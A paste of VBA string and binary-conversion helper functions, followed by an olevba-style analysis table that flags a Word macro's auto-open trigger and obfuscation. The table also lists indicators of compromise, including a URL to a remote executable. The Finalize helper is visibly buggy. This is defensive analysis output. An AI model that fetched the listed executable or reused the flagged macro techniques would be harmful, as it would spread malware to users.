  794. Function CutOff(ByVal SourceText As String, Length As Byte)
  795.  
  796.     If Len(SourceText) > Length Then
  797.         CutOff = Mid$(SourceText, Length + 1)
  798.     Else
  799.         CutOff = SourceText
  800.     End If
  801.  
  802. End Function
  803.  
  804.  
  805.  
  806. '==========================================================================
  807. ' FUNCTION: TRUE LENGTH OF STRING WITHOUT "/" SLASH SYMBOLS
  808. '
  809. '==========================================================================
  810. Public Function TrueLOF(SourceString As String) As Integer 'returns true LOF without slashes
  811.  
  812.  TrueLOF = Len(Replace$(SourceString, "/", vbNullString))
  813.    
  814. End Function
  815.  
  816.  
  817.  
  818. '==========================================================================
  819. ' FUNCTION: MERGE ALL MODDED VALUES OF ALL PARAMETERS OF SELECTED PATCH.
  820. ' Used to collect all modified param. values for preset / config writing.
  821. '==========================================================================
  822. Public Function MergeModdedValues(PatchNumber As Integer) As String
  823.  
  824. On Error GoTo ErrorHandler
  825.  
  826.  Dim tmpStringArray() As String
  827.  Dim cntUnitCounter As Integer
  828.  
  829.     ReDim tmpStringArray(UBound(PatchArray(PatchNumber).patchParams))
  830.    
  831.     For cntUnitCounter = LBound(PatchArray(PatchNumber).patchParams) To UBound(PatchArray(PatchNumber).patchParams)
  832.         tmpStringArray(cntUnitCounter) = PatchArray(PatchNumber).patchParams(cntUnitCounter).parModdedValue
  833.     Next cntUnitCounter
  834.    
  835.     MergeModdedValues = Join(tmpStringArray, kDivider2)
  836.    
  837.     Exit Function
  838.    
  839. ErrorHandler:
  840.     MergeModdedValues = vbNullString
  841.  
  842. End Function
  843.  
  844.  
  845.  
  846. '==========================================================================
  847. ' FUNCTION: STRIPOUT
  848. ' Deletes specific symbols from string.
  849. '==========================================================================
  850. Public Function StripOut(SourceString As String, SymbolsToKill As String) As String
  851.  
  852.  Dim i As Integer
  853.  
  854.     StripOut = SourceString
  855.    
  856.     For i = 1 To Len(SymbolsToKill)
  857.         StripOut = Replace(StripOut, Mid$(SymbolsToKill, i, 1), vbNullString)
  858.     Next i
  859.  
  860. End Function
  861.  
  862.  
  863.  
  864. '==========================================================================
  865. ' FUNCTION: STRIPOUT
  866. ' Leaves only specified symbols in a string.
  867. '==========================================================================
  868. Public Function StripIn(SourceString As String, SymbolsToLeave As String) As String
  869.  
  870.  Dim i, i2 As Integer
  871.  Dim c, s As String
  872.  Dim t As String
  873.  
  874.     StripIn = vbNullString
  875.     t = vbNullString
  876.    
  877.    
  878.     For i = 1 To Len(SourceString)
  879.         For i2 = 1 To Len(SymbolsToLeave)
  880.             c = Mid$(SymbolsToLeave, i2, 1)
  881.             s = Mid$(SourceString, i, 1)
  882.             If s = c Then t = t & c
  883.         Next i2
  884.     Next i
  885.    
  886.     StripIn = t
  887.  
  888. End Function
  889.  
  890.  
  891. '==========================================================================
  892. ' FUNCTION: FINALIZE
  893. ' Finalizes string with desired character, only if there is no such present
  894. '==========================================================================
  895. Public Function Finalize(SourceString As String, EndChar As String) As String
  896.  
  897. If UCase$(Right$(SourceString, 1)) <> UCase$(Left$(EndChar, 1)) Then Finalize = Finalize & Left$(EndChar, 1) Else Finalize = SourceString
  898.  
  899. End Function
  900.  
  901.  
  902. '==========================================================================
  903. ' FUNCTION: CONVERT TO BYTE WITH OVERFLOW PREVENTION
  904. '==========================================================================
  905. Public Function CByteL(ByVal Value As Long) As Byte
  906.     If Value > 255 Then CByteL = 255: Exit Function
  907.     CByteL = CByte(Value)
  908. End Function
  909.  
  910.  
  911. '==========================================================================
  912. ' FUNCTION: CONVERT TO INTEGER WITH OVERFLOW PREVENTION
  913. '==========================================================================
  914. Public Function CIntL(ByVal Value As Long) As Integer
  915.     If Value > 32767 Then CIntL = CInt(Value - 65536): Exit Function
  916.     CIntL = CInt(Value)
  917. End Function
  918.  
  919.  
  920.  
  921. '==========================================================================
  922. ' FUNCTION: BIN-2-DEC
  923. ' Converts binary string (e.g. 01010101) into decimal (e.g. 85)
  924. '==========================================================================
  925. Public Function Bin2Dec(Num As String) As Long
  926.   Dim n As Long
  927.   Dim a As Long
  928.   Dim x As String
  929.      n = Len(Num) - 1
  930.      a = n
  931.      Do While n > -1
  932.         x = Mid(Num, ((a + 1) - n), 1)
  933.         Bin2Dec = IIf((x = "1"), Bin2Dec + (2 ^ (n)), Bin2Dec)
  934.         n = n - 1
  935.      Loop
  936. End Function
  937.  
  938.  
  939. '==========================================================================
  940. ' FUNCTION: DEC-2-BIN 8
  941. ' Converts decimal byte into 8 bits as string.
  942. '==========================================================================
  943. Public Function Dec2Bin8(ByVal DecVal As Byte) As String
  944.     Dim i As Integer
  945.     Dim sResult As String
  946.  
  947.     sResult = Space(8)
  948.     For i = 0 To 7
  949.         If DecVal And (2 ^ i) Then
  950.             Mid(sResult, 8 - i, 1) = "1"
  951.         Else
  952.             Mid(sResult, 8 - i, 1) = "0"
  953.         End If
  954.     Next
  955.     Dec2Bin8 = sResult
  956. End Function
  957.  
  958.  
  959. '==========================================================================
  960. ' FUNCTION: DEC-2-BIN 16
  961. ' Converts decimal byte into 16 bits as string.
  962. '==========================================================================
  963. Public Function Dec2Bin16(ByVal DecVal As Integer) As String
  964.     Dim i As Integer
  965.     Dim sResult As String
  966.  
  967.     sResult = Space(16)
  968.     For i = 0 To 15
  969.         If DecVal And (2 ^ i) Then
  970.             Mid(sResult, 16 - i, 1) = "1"
  971.         Else
  972.             Mid(sResult, 16 - i, 1) = "0"
  973.         End If
  974.     Next
  975.     Dec2Bin16 = sResult
  976. End Function
  977.  
  978. +------------+----------------------+-----------------------------------------+
  979. | Type       | Keyword              | Description                             |
  980. +------------+----------------------+-----------------------------------------+
  981. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  982. | Suspicious | Open                 | May open a file                         |
  983. | Suspicious | Binary               | May read or write a binary file (if     |
  984. |            |                      | combined with Open)                     |
  985. | Suspicious | CreateObject         | May create an OLE object                |
  986. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  987. |            |                      | strings                                 |
  988. | Suspicious | SaveToFile           | May create a text file                  |
  989. | Suspicious | Write                | May write to a file (if combined with   |
  990. |            |                      | Open)                                   |
  991. | Suspicious | Output               | May write to a file (if combined with   |
  992. |            |                      | Open)                                   |
  993. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  994. |            |                      | be used to obfuscate strings (option    |
  995. |            |                      | --decode to see all)                    |
  996. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  997. |            | Strings              | may be used to obfuscate strings        |
  998. |            |                      | (option --decode to see all)            |
  999. | IOC        | http://landrevie.g.f | URL (obfuscation: VBA expression)       |
  1000. |            | ree.fr/45gf3/7uf3ref |                                         |
  1001. |            | .exe                 |                                         |
  1002. | IOC        | ruebfo.exe           | Executable file name (obfuscation: VBA  |
  1003. |            |                      | expression)                             |
  1004. | IOC        | 7uf3ref.exe          | Executable file name (obfuscation: VBA  |
  1005. |            |                      | expression)                             |
  1006. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment